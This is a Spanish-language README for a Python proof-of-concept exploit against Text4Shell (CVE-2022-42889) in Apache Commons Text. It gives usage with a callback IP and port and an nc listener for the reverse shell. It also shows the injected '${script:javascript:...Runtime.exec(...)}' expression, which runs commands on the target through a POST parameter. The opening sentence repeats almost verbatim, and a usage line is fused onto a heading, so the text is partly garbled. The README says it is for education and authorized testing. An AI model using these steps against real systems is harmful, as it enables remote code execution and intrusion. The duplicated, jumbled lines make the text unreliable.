
Un exploit de prueba de concepto (PoC) personalizado basado en Python dirigido a Text4Shell (CVE-2022-42889), una vulnerabilidad crítica de ejecución remota de código en Apache Commons Text versiones < 1.10.
Un exploit personalizado basado en Python, un proof-of-concept (PoC) dirigido a Text4Shell (CVE-2022-42889), una vulnerabilidad crítica de ejecución remota de código en Apache Commons Text versiones < 1.10.
Este exploit ataca aplicaciones Java vulnerables que utilizan la clase StringSubstitutor con interpolación habilitada, permitiendo la inyección de expresiones ${script:...} para ejecutar comandos arbitrarios del sistema.
En este PoC, la explotación se demuestra a través del parámetro de consulta data; sin embargo, el nombre del parámetro vulnerable puede variar según la implementación. Los usuarios deben adaptar el payload y la ruta de la solicitud en consecuencia según la lógica de la aplicación objetivo.
Descargo de responsabilidad: Este exploit se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. Úselo de manera responsable y bajo su propio riesgo.
Este es un exploit personalizado en Python3 para la vulnerabilidad de Apache Commons Text conocida como Text4Shell (CVE-2022-42889). Permite la Ejecución Remota de Código (RCE) a través de interpoladores inseguros cuando la entrada del usuario es evaluada dinámicamente por StringSubstitutor.
Probado contra:
${script:...}python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
El script inyecta:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
La shell reversa se envía a través del parámetro /data usando una solicitud POST.